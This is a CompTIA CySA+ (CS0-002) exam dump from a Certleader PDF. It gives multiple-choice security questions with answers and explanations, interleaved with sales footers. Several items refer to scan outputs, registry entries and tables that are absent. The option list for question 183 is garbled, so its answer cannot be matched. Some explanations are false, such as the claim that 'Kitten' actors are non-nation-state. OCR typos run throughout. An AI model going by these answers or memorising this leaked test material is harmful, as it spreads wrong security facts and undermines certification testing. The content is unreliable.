A company offers a hardware security appliance to customers that provides remote administration of a device on the customer's network Customers are not
authorized to alter the configuration The company deployed a software process to manage unauthorized changes to the appliance log them, and forward them to a
central repository for evaluation Which of the following processes is the company using to ensure the appliance is not altered from its ongmal configured state?

A. CI/CD
B. Software assurance
C. Anti-tamper
D. Change management

Answer: C

Explanation:
Anti-tamper is a process that protects a system or device from unauthorized changes or modifications. It can also log and report any attempts to alter the system or
device. The company is using anti-tamper to ensure the appliance is not altered from its original configured state. CI/CD, software assurance, and change
management are not processes that specifically deal with unauthorized changes. Reference: https://www.acq.osd.mil/se/briefs/16943-DoD-AT-Overview-Brief.pdf

NEW QUESTION 173


Which of the following would best protect sensitive data If a device is stolen?

A. Remote wipe of drive


B. Self-encrypting drive
C. Password-protected hard drive
D. Bus encryption

Answer: B

Explanation:
A self-encrypting drive is a type of hard drive that automatically encrypts and decrypts data using a hardware-based mechanism. A self-encrypting drive can best
protect sensitive data if a device is stolen, because it prevents unauthorized access to the data without the proper encryption key or password.

NEW QUESTION 174


Which of the following is the most important reason to involve the human resources department in incident response?

A. To better Inform recruiters during hiring so they can include incident response Interview questions
B. To ensure the incident response process captures evidence needed in case of disciplinary actions
C. To validate that the incident response process meets the organization's best practices
D. To prevent Incident responders from Interacting directly with any users

Answer: B

Explanation:
The human resources department should be involved in incident response, to ensure that the incident response process captures evidence needed in case of
disciplinary actions against any employees who may have caused or contributed to the incident, either intentionally or unintentionally. The human resources
department can also help with enforcing policies and procedures, communicating with employees, and providing legal or ethical guidance.

NEW QUESTION 179


Which of the following is the best reason why organizations need operational security controls?

A. To supplement areas that other controls cannot address


B. To limit physical access to areas that contain sensitive data
C. To assess compliance automatically against a secure baseline
D. To prevent disclosure by potential insider threats

Answer: A

Explanation:
Operational security controls are security measures that are implemented and executed by people rather than by systems. Operational security controls are
needed to supplement areas that other controls, such as technical or physical controls, cannot address. For example, operational security controls can include
policies, procedures, training, awareness, audits, reviews, testing, etc. These controls can help ensure that employees follow best practices, comply with
regulations, detect and report incidents, and respond to emergencies. The other options are not specific to operational security controls or are too narrow in scope.
References: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 14; https://www.isaca.org/resources/isaca-
journal/issues/2016/volume-3/operational-security-controls

NEW QUESTION 183


In response to an audit finding, a company's Chief information Officer (CIO) instructed the security department to Increase the security posture of the vulnerability
management program. Currency, the company's vulnerability management program has the following attributes:
Which of the following would BEST Increase the security posture of the vulnerably management program?

A. Expand the ports Being scanned lo Include al ports increase the scan interval to a number the business win accept without causing service interruptio
B. Enable authentication and perform credentialed scans

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

C. Expand the ports being scanned to Include all port


D. Keep the scan interval at its current level Enable authentication and perform credentialed scans.
E. Expand the ports being scanned to Include at ports increase the scan interval to a number the business will accept without causing service Interruptio
F. Continue unauthenticated scans.
G. Continue scanning the well-known ports increase the scan interval to a number the business will accept without causing service Interruptio
H. Enable authentication and perform credentialed scans.

Answer: A

Explanation:
A vulnerability scan is a process of identifying and assessing known vulnerabilities in a system or network
using automated tools or software1
A vulnerability scan can help improve the security posture of a
vulnerability management program by detecting and prioritizing potential weaknesses that could be exploited by attackers. To increase the security posture of a
vulnerability scan, the following actions can be taken:
Expand the ports being scanned to include all ports: This means scanning all possible ports on a system or network, not just the well-known or commonly used
ones. This can help discover more vulnerabilities that may be hidden or overlooked on less frequently used ports.
Increase the scan interval to a number the business will accept without causing service interruption: This means scanning more frequently or regularly, but not
so often that it causes performance issues or downtime for the system or network. This can help keep up with new vulnerabilities that may emerge over time and
reduce the window of opportunity for attackers.
Enable authentication and perform credentialed scans: This means using login credentials or SSH keys on an asset to get deeper access to its data,
processes, configurations, and vulnerabilities2
This can help discover more vulnerabilities that cannot be seen from the network, such as insecure versions of software or poor security permissions.

NEW QUESTION 185


While conoXicting a cloud assessment, a security analyst performs a Prowler scan, which generates the following within the report:

Based on the Prowler report, which of the following is the BEST recommendation?

A. Delete Cloud Dev access key 1


B. Delete BusinessUsr access key 1.
C. Delete access key 1.
D. Delete access key 2.

Answer: A

Explanation:
The best recommendation based on the Prowler report is to delete Cloud Dev access key 1. This is because the report shows that this access key has not been
used for more than 90 days, which violates the AWS security best practice of rotating access keys every 90 days or less. Deleting unused or inactive access keys
can reduce the risk of unauthorized access or compromise of AWS resources.

NEW QUESTION 190


An analyst Is reviewing a web developer's workstation for potential compromise. While examining the workstation's hosts file, the analyst observes the following:

Which of the following hosts file entries should the analyst use for further investigation?

A. ::1
B. 127.0.0.1
C. 192.168.3.249
D. 198.51.100.5

Answer: D

Explanation:
The hosts file is a text file that maps hostnames to IP addresses, and it can be used to override DNS resolution. The hosts file entries that should be used for
further investigation are the ones that point to external or suspicious IP addresses, such as 198.51.100.5, which is a reserved IP address for documentation
purposes. The other entries are either loopback addresses (::1 and 127.0.0.1) or internal network addresses (192.168.3.249), which are less likely to be malicious.

NEW QUESTION 194


A company's blocklist has outgrown the current technologies in place. The ACLs are at maximum, and the IPS signatures only allow a certain amount of space for
domains to be added, creating the need for multiple signatures. Which of the following configuration changes to the existing controls would be the MOST
appropriate to improve performance?

A. Implement a host-file-based solution that will use a list of all domains to deny for all machines on the network.
B. Create an IDS for the current blocklist to determine which domains are showing activity and may need to be removed
C. Review the current blocklist and prioritize it based on the level of threat severit
D. Add the domains with the highest severity to the blocklist.
E. Review the current blocklist to determine which domains can be removed from the list and then update the ACLs

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

Answer: D

Explanation:
This is the most effective way to improve performance, as it allows you to reduce the amount of domains in the blocklist and reduce the size of the ACLs. By
reviewing the blocklist and removing domains that are no longer active or no longer pose a threat, the blocklist can be reduced and the ACLs updated accordingly.
This will reduce the amount of traffic and processing power required to manage the blocklist, and can help improve overall performance.

NEW QUESTION 199


A security analyst is attempting to resolve an incident in which highly confidential company pricing information was sent to clients. It appears this information was
unintentionally sent by an employee who attached it to public marketing material. Which of the following configuration changes would work BEST to limit the risk of
this incident being repeated?

A. Add client addresses to the blocklist.


B. Update the DLP rules and metadata.
C. Sanitize the marketing material.
D. Update the insider threat procedures.

Answer: B

Explanation:
Data Loss Prevention (DLP) is a security technology designed to detect, prevent, and respond to the unauthorized disclosure of confidential data. By updating the
DLP rules and metadata, it is possible to better define what types of confidential information can be shared and limit access to any sensitive documents.
DLP rules and metadata can help to identify, classify and label sensitive data based on its content and context. DLP rules and metadata can also help to enforce
actions or policies on sensitive data, such as blocking, encrypting or alerting .

NEW QUESTION 202


Due to continued support of legacy applications, an organization's enterprise password complexity rules are inadequate for its required security posture. Which of
the following is the BEST compensating control to help reduce authentication compromises?

A. Smart cards
B. Multifactor authentication
C. Biometrics
D. Increased password-rotation frequency

Answer: B

Explanation:
Multifactor authentication is a method of verifying a user’s identity by requiring two or more pieces of evidence, such as something the user knows (e.g.,
password), something the user has (e.g., token), or something the user is (e.g., fingerprint). Multifactor authentication is the best compensating control to help
reduce authentication compromises when the organization’s enterprise password complexity rules are inadequate for its required security posture. Smart cards,
biometrics, or increased password-rotation frequency are other possible controls, but they are not as effective or comprehensive as multifactor authentication.
Reference:
https://www.csoonline.com/article/3239144/what-is-multifactor-authentication-mfa-how-it-works-and-why-you

NEW QUESTION 206


Which of the following organizational initiatives would be MOST impacted by data severighty issues?

A. Moving to a cloud-based environment


B. Migrating to locally hosted virtual servers
C. Implementing non-repudiation controls
D. Encrypting local database queries

Answer: A

Explanation:
Data sovereignty is the idea that data are subject to the laws and governance structures of the nation where
they are collected1
Data sovereignty issues can impact organizational initiatives that involve transferring or
storing data across different jurisdictions, such as moving to a cloud-based environment. Cloud computing involves using remote servers and networks to store
and process data, which may be located in different
countries or regions with different data protection laws and regulations2
This can create challenges for organizations that need to comply with data sovereignty requirements of their own country or their customers’ countries, such as
data localization, data access, data security, data breach notification, etc3
References: 1
Permission.io 3

NEW QUESTION 209


A company wants to configure the environment to allow passive network monitonng. To avoid disrupting the sensitive network, which of the following must be
supported by the scanner's NIC to assist with the company's request?

A. Port bridging
B. Tunnel all mode
C. Full-duplex mode
D. Port mirroring
E. Promiscuous mode

Answer: E

Explanation:

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

Promiscuous mode is the mode that must be supported by the scanner’s NIC to assist with the company’s request of passive network monitoring. Promiscuous
mode is a mode of operation for a network interface controller (NIC) that causes the controller to pass all traffic it receives to the central processing unit (CPU)
rather than passing only the frames that the controller is specifically programmed to receive. This mode is normally used for packet sniffing, the practice of
collecting and logging packets that pass through the network for further analysis, such as the analysis of traffic or bandwidth usage1. Promiscuous mode makes
sure all transmitted data packets are received and read by network adapters.

NEW QUESTION 214


The incident response team is working with a third-party forensic specialist to investigate the root cause of a recent intrusion An analyst was asked to submit
sensitive network design details for review The forensic specialist recommended electronic delivery for efficiency but email was not an approved communication
channel to send network details Which of the following BEST explains the importance of using a secure method of communication during incident response?

A. To prevent adversaries from intercepting response and recovery details


B. To ensure intellectual property remains on company servers
C. To have a backup plan in case email access is disabled
D. To ensure the management team has access to all the details that are being exchanged

Answer: A

Explanation:
To prevent adversaries from intercepting response and recovery details. Using a secure method of communication during incident response is important to prevent
adversaries from intercepting response and recovery details that could reveal the incident response team’s actions, strategies, or findings. If the adversaries can
intercept the communication, they could use it to evade detection, escalate their privileges, or launch further attacks. To ensure intellectual property remains on
company servers, to have a backup plan in case email access is disabled, or to ensure the management team has access to all the details that are being
exchanged are other possible reasons to use a secure method of communication, but they are not as important as preventing adversaries from intercepting
response and recovery details. Reference: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901

NEW QUESTION 218


Which of the following BEST explains the function of a managerial control?

A. To help design and implement the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system maintenance
C. To create data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the implementation of audit trails

Answer: A

Explanation:
A managerial control is a function of management that involves setting performance standards, measuring performance, and taking corrective actions when
necessary. A managerial control helps to regulate the organizational activities and ensure that they are aligned with the organizational goals and objectives1. One
of the functions of a managerial control is to help design and implement the security planning, program development, and maintenance of the security life cycle.
The security life cycle is a process that defines the phases of security activities from initiation to disposal2. A managerial control can help to establish the security
policies, procedures, roles, and responsibilities for each phase of the security life cycle. A managerial control can also help to monitor and evaluate the security
performance and effectiveness of each phase and take corrective actions if needed.

NEW QUESTION 223


After examine a header and footer file, a security analyst begins reconstructing files by scanning the raw data bytes of a hard disk and rebuilding them. Which of
the following techniques is the analyst using?

A. Header analysis
B. File carving
C. Metadata analysis
D. Data recovery

Answer: B

Explanation:
Three common types of file carving methods are as follows: Header- and footer-based carving, which focuses on headers like those found in JPEG files. For
example, JPEGs can be found by looking for \xFF\xD8 in the header and \xFF\xD9 in the footer. Content-based carving techniques look for information about the
content of a file such as character counts and text recognition. File structure-based carving techniques that use information about the structure of files.
File carving is a technique for recovering files from raw data bytes by scanning and rebuilding them based on their file headers and footers. File headers and
footers are sequences of bytes that indicate the beginning and end of a file format, such as JPEG, PDF, ZIP, etc. File carving can be used to reconstruct files that
are deleted, corrupted, fragmented, or encrypted by bypassing the file system structure and looking for recognizable patterns in the data3
The analyst used file carving to reconstruct files from a hard disk by scanning the raw
data bytes and rebuilding them based on their file headers and footers.

NEW QUESTION 227


A security analyst is handling an incident in which ransomware has encrypted the disks of several company workstations. Which of the following would work BEST
to prevent this type of Incident in the future?

A. Implement a UTM instead of a stateful firewall and enable gateway antivirus.


B. Back up the workstations to facilitate recovery and create a gold Image.
C. Establish a ransomware awareness program and implement secure and verifiable backups.
D. Virtualize all the endpoints with dairy snapshots of the virtual machines.

Answer: C

Explanation:
Ransomware is a type of malware that encrypts the files or disks of a victim’s device and demands a ransom for the decryption key. Ransomware can cause
significant damage, disruption, and data loss for individuals and organizations. To prevent this type of incident in the future, the best strategy is to combine user

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

education and data protection. A ransomware awareness program can help users recognize and avoid potential ransomware attacks, such as phishing emails,
malicious attachments, or compromised websites. A secure and verifiable backup system can help users recover their data in case of a ransomware infection,
without paying the ransom or relying on the attackers. A backup system should be regularly tested and updated, and stored offline or in a separate location from
the original data.

NEW QUESTION 229


A company has a cluster of web servers that is critical to the business. A systems administrator installed a utility to troubleshoot an issue, and the utility caused the
entire cluster to 90 offline. Which of the following solutions would work BEST prevent to this from happening again?

A. Change management
B. Application whitelisting
C. Asset management
D. Privilege management

Answer: A

Explanation:
Change Management
o The process through which changes to the configuration of information systems are monitored and controlled, as part of the organization's overall configuration
management efforts
o Each individual component should have a separate document or database record that describes its initial state and subsequent changes
Configuration information Patches installed
Backup records Incident reports/issues
o Change management ensures all changes are planned and controlled to minimize risk of a service disruption
Change management is a process that ensures changes to systems or processes are introduced in a controlled and coordinated manner. Change management
helps to minimize the impact of changes on the business operations and avoid unintended consequences or errors3
Change management can help prevent the issue of utility installation affecting the web server cluster by ensuring that the utility is properly planned, tested,
approved, documented, communicated, and monitored.

NEW QUESTION 231


An analyst is reviewing registry keys for signs of possible compromise. The analyst observes the following entries:

Which of the following entries should the analyst investigate first?

A. IAStorIcon
B. Quickset
C. SecurityHeaIth
D. calc
E. Word

Answer: D

Explanation:
The calc entry is a suspicious registry entry that should be investigated first by the analyst. The calc entry is located in the
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key, which is a common location for malware to persist and execute on
system startup. The calc entry has a data value of “C:\Windows\System32\calc.exe”, which is the path to the legitimate Windows Calculator program. However,
this program does not need to run on system startup, and it could be a disguise for a malicious executable that has replaced or renamed the original calculator
program. The calc entry could also be a sign of a fileless malware attack, where the attacker uses the legitimate calculator program to execute malicious
commands or scripts in memory1.

NEW QUESTION 233


Which of the following APT adversary archetypes represent non-nation-state threat actors? (Select TWO)

A. Kitten
B. Panda
C. Tiger
D. Jackal
E. Bear
F. Spider

Answer: AD

Explanation:
Kitten and Jackal are two APT (Advanced Persistent Threat) adversary archetypes that represent
non-nation-state threat actors. APT adversary archetypes are categories of threat actors that share common characteristics, such as motivation, objectives,
capabilities, or tactics. APT adversary archetypes can help security analysts understand and prioritize the threats they face2. Kitten is a term used to describe
Iranian-based threat actors that are typically not backed by the Iranian government. They are motivated by
ideological or religious beliefs and target political or regional adversaries3. Jackal is a term used to describe cybercriminal groups that operate as mercenaries or

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

proxies for other threat actors. They are motivated by financial gain and target various sectors and regions.

NEW QUESTION 237


Which of the following incident response components can identify who is the llaison between multiple lines of business and the pubic?

A. Red-team analysis
B. Escalation process and procedures
C. Triage and analysis
D. Communications plan

Answer: D

Explanation:
A communications plan is a document that outlines how information will be communicated during an incident response process. It defines who will communicate
what information, when, how, and to whom4 A
communications plan can identify who is the liaison between multiple lines of business and the public, as well as other stakeholders such as senior management,
legal counsel, law enforcement, or media. A liaison is a person who acts as a link or intermediary between different parties or groups to facilitate communication
and coordination.

NEW QUESTION 242


A threat intelligence group issued a warning to its members regarding an observed increase in attacks performed by a specific threat actor and the related loCs.
Which is of the following is (he best method to operationalize these loCs to detect future attacks?

A. Analyzing samples of associated malware


B. Publishing an internal executive threat report
C. Executing an adversary emulation exercise
D. Integrating the company's SIEM platform

Answer: D

Explanation:
This is the best method to operationalize these loCs to detect future attacks because it allows the company to collect, correlate, analyze, and alert on the indicators
of compromise (loCs) from various sources and systems. A SIEM stands for security information and event management, which is a software or service that
provides centralized visibility and management of security events and data.

NEW QUESTION 244


Which of the following BEST describes HSM?

A. A computing device that manages cryptography, decrypts traffic, and maintains library calls
B. A computing device that manages digital keys, performs encryption/decryption functions, and maintains other cryptographic functions
C. A computing device that manages physical keys, encrypts devices, and creates strong cryptographic functions
D. A computing device that manages algorithms, performs entropy functions, and maintains digital signatures

Answer: B

Explanation:
HSM (Hardware Security Module) is a computing device that manages digital keys, performs encryption/decryption functions, and maintains other cryptographic
functions2. HSM is a dedicated crypto processor that is specifically designed for the protection of the crypto key lifecycle. HSM can store cryptographic keys that
are used for encryption, authentication, digital signatures, and other security functions. HSM can also generate random keys that are unique to each device and
never leave the chip. HSM can protect these keys from unauthorized access or tampering by using hardware isolation and encryption3. HSM can also measure
and verify the integrity of the operating system and firmware on a device by using a process called attestation. HSM does not manage cryptography (A), as
cryptography is the science or art of creating and using secret codes. HSM does not manage physical keys ©, as physical keys are tangible objects that are used
to lock or unlock something. HSM does not manage algorithms (D), as algorithms are sets of rules or instructions that are used to solve problems or perform tasks.
References: 2: https://www.techopedia.com/definition/24771/technical-controls 3: https://www.techopedia.com/definition/25888/security-development-lifecycle-sdl

NEW QUESTION 247


An organization has the following policies:
*Services must run on standard ports.
*Unneeded services must be disabled.
The organization has the following servers:
*192.168.10.1 - web server
*192.168.10.2 - database server
A security analyst runs a scan on the servers and sees the following output:

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

Which of the following actions should the analyst take?

A. Disable HTTPS on 192.168.10.1.


B. Disable IIS on 192.168.10.1.
C. Disable DNS on 192.168.10.2.
D. Disable MSSQL on 192.168.10.2.
E. Disable SSH on both servers.

Answer: E

Explanation:
SSH stands for Secure Shell, which is a protocol that allows remote access and administration of a server. If the organization has a policy that services must run
on standard ports and unneeded services must be disabled, then SSH should be disabled on both servers, because it runs on port 22, which is not a standard port
for a web server or a database server, and it is not needed for those servers to function properly. Disabling HTTPS on 192.168.10.1, disabling IIS on 192.168.10.1,
disabling DNS on 192.168.10.1, or disabling MSSQL on 192.168.10.2 are not appropriate actions, because they would affect the functionality of the web server or
the database server and violate the organization’s policy of running services on standard ports. Reference: https://www.ssh.com/ssh/port

NEW QUESTION 251


A company has Detected a large number of tailed login attempts on its network A security analyst is investigating the network's activity logs to establish a pattern
of behavior. Which of the following techniques should the analyst use to analyze the increase in failed login attempts?

A. Evidence visualization
B. Pattern matching
C. Event correlation
D. Network sniffing

Answer: C

Explanation:
This is the technique that the analyst should use to analyze the increase in failed login attempts on the network. Event correlation is a process that analyzes
multiple events or logs from different sources and identifies patterns, relationships, or causal links between them. Event correlation can help reveal the root cause,
scope, impact, and sequence of a security incident.

NEW QUESTION 253


A company creates digitally signed packages for its devices. Which of the following best describes the method by which the security packages are delivered to the
company's customers?

A. Antitamper mechanism
B. SELinux
C. Trusted firmware updates
D. eFuse

Answer: C

Explanation:
Trusted firmware updates are a method by which security packages are delivered to the company’s customers. Trusted firmware updates are digitally signed
packages that contain software updates or patches for devices, such as routers, switches, or firewalls. Trusted firmware updates can help to ensure the
authenticity and integrity of the packages by verifying the digital signature of the sender and preventing unauthorized or malicious modifications to the packages .

NEW QUESTION 257


An organization has the following risk mitigation policy:
Risks with a probability of 95% or greater will be addressed before all others regardless of the impact. All other prioritization will be based on risk value.
The organization has identified the following risks:

Which of the following is the order of priority for risk mitigation from highest to lowest?

A. A, B, D, C
B. A, B, C, D
C. D, A, B, C
D. D, A, C, B

Answer: D

Explanation:
According to the risk mitigation policy, risks with a probability of 95% or greater will be addressed first, regardless of the impact. Therefore, risk D is the highest
priority, as it has a probability of 95% and an impact of $100,000. The next priority is risk A, which has a probability of 90% and an impact of $200,000. The
remaining risks will be prioritized based on their risk value, which is calculated by multiplying the probability and the impact. Risk C has a risk value of $40,000
(80% x $50,000), while risk B has a risk value of $30,000 (60% x $50,000). Therefore, risk C is higher priority than risk B.

NEW QUESTION 259


An analyst received an alert regarding an application spawning a suspicious command shell process Upon further investigation, the analyst observes the following
registry change occurring immediately after the suspicious event:

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

Which of the following was the suspicious event able to accomplish?

A. Impair defenses.
B. Establish persistence.
C. Bypass file access controls.
D. Implement beaconing.

Answer: B

Explanation:
The suspicious event was able to accomplish establishing persistence by creating a registry change that runs a command shell process every time a user logs on.
The registry change modifies the Userinit value under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon key, which
specifies what programs should run when a user logs on to Windows. By appending “cmd.exe,” to the existing value, the event ensures that a command shell
process will be launched every time a user logs on, which can allow the attacker to maintain access to the system or execute malicious commands. The other
options are not related to the registry change. References: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 10;
https://docs.microsoft.com/en-us/windows/win32/sysinfo/userinit-entry

NEW QUESTION 263


After a series of Group Policy Object updates, multiple services stopped functioning. The systems administrator believes the issue resulted from a Group Policy
Object update but cannot validate which update caused the Issue. Which of the following security solutions would resolve this issue?

A. Privilege management
B. Group Policy Object management
C. Change management
D. Asset management

Answer: C

Explanation:
Change management is a process that ensures changes to systems or processes are introduced in a controlled and coordinated manner. Change management
helps to minimize the impact of changes on the business operations and avoid unintended consequences or errors1
Change management can help resolve the issue of
Group Policy Object updates affecting multiple services by ensuring that the updates are properly planned, tested, approved, documented, communicated, and
monitored.

NEW QUESTION 266


......

The Leader of IT Certification visit - https://www.certleader.com


100% Valid and Newest Version CS0-002 Questions & Answers shared by Certleader
https://www.certleader.com/CS0-002-dumps.html (372 Q&As)

Thank You for Trying Our Product

* 100% Pass or Money Back


All our products come with a 90-day Money Back Guarantee.
* One year free update
You can enjoy free update one year. 24x7 online support.
* Trusted by Millions
We currently serve more than 30,000,000 customers.
* Shop Securely
All transactions are protected by VeriSign!

100% Pass Your CS0-002 Exam with Our Prep Materials Via below:

https://www.certleader.com/CS0-002-dumps.html

The Leader of IT Certification visit - https://www.certleader.com


Powered by TCPDF (www.tcpdf.org)

You might also like